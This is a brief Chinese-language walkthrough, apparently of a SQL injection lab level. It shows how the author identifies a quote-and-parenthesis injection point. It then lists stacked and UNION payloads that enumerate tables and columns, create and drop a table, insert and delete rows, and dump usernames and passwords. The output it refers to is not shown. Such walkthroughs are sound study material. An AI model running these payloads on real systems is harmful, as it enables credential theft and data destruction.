首先判断注入点
输入如下
id=1 and 1=2
回显如下
说明属于字符型
然后输入如下
id=1'
回显如下
佐证输入如下
id=1'--+
还是没有回显 难道存在括号吗
试一试1')--+
果然是单引号带有一个括号
注入类型判断好了以后 接着进行堆叠注入和联合注入
首先判断回显点以及创建一个表格
输入如下
id=0') union select 1,2,3;create table demo like users--+
回显如下
接着进行爆表操作以及添加数据操作
输入如下
id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();insert into demo values(1,"xiaoming","111")--+
回显如下
接着进行爆字段以及删除数据操作 输入如下
id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database();delete from demo where id=1--+
回显如下
最后进行包用户名和密码以及删除表格操作 输入如下
id=1') union select 1,2,group_concat(username,password) from users;drop table demo--+
回显如下
成功解题 嗨嗨!!